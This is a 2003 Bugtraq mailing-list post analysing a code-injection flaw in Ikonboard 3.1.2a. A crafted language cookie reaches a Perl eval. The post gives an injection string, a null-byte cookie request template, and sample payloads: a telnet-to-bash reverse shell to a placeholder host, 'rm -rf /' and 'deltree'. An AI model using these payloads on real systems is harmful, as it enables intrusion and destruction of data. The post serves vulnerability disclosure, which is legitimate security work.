Attemps with Ikonboard 3.1.2a

To: mike@xxxxxxxxxxxxxxx;, bugtraq@xxxxxxxxxxxxxxxxx
Subject: Attemps with Ikonboard 3.1.2a
From: Shan Whitman <xzziroz@xxxxxxxxxxxx>
Date: Wed, 10 Sep 2003 01:44:29 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mutt/1.2.5.1i

Vender: Jarvis Entertainment
Product: Ikonboard
Version: 3.1.2a and Below (All current versions).

On the topic of the recent post about Ikonboard and it's command execution 
vulnerabilities

In FUNC.pm: 

# Make sure the cookie data is legal

        if ($iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}) {

            $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~ 
s/^([\d\w]+)$/$1/;

        }



        $default = $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}

                        || $iB::INFO->{'DEFAULT_LANGUAGE'}

                        || 'en';



        # Quick check to make sure the directory exists



        unless (-d $iB::INFO->{IKON_DIR}."Languages/$default") {

                $default = 'en';

        }



        my $code = 'require '. "\"$default/" .$area. '.pm"; $lang ='. $area. 
'->new();';

        eval $code;



        $obj->cgi_error("Could not access the language file: $@") if $@;

        return $lang;

}

--------------

The first bit is of course where the exploit actualy accures. Although we can 
in definitely define $default to our own value I scratched my head for a while 
trying to figure out how this could be exploited.

After a few hours of staring i came to the final (and easy) conclusion that is 
this:

If $default where to equal: where 'en' is the usualy default string contained 
in $default and UniversalWords is contained in $area and then the .pm etc.
$default = "en/UniversalWords.pm\"; <My code> ; ##"

then the eval would simply interpret to the following: 

eval require "en/UniversalWords.pm"; <My Code>; ##/" .$area. '.pm"; $lang = '. 
$area. '->new().

so what would happen is the eval would do the require on en/UniversalWords.pm 
then it would move on to execute whatever arbitrary perl code you placed in <My 
Code>. Such as a 
" `telnet bla.bla.bla.bla | /bin/bash | telnet bla.bla.bla.bla` " or worse 
(hopefully) an deltree C: /y or rm -rf /, seeing as Ikonboard can be ran on 
linux or windows.

The meathod of injecting the code we wish into $default would be as simple as 
it is in the exploit for 3.1.1: 

GET $PATH HTTP/1.1
Host: $HOST
Cookie: lang=%HEX$HEX%HEX%00 ## Followed by a Null Byte to bypass filters.
Connection: close

-------

As of this moment I have not written a working exploit and am not even 100% 
sure if this would work, seeing as the person who posted this vulnerability a 
day ago claimed he had a working example I decided to wait on this to see how 
it is done.

--K-sPecial

Prev by Date: Re: Microsoft security update broken?
Next by Date: Re: XSS vulnerability in phpBB (an other ;-)
Previous by thread: MSIE->RefBack
Next by thread: Permitting recursion can allow spammers to steal name server resources
Index(es):
- Date
- Thread